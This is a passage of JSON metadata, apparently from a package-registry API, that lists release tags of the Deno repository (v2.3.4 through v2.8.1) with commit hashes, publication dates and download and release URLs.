v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/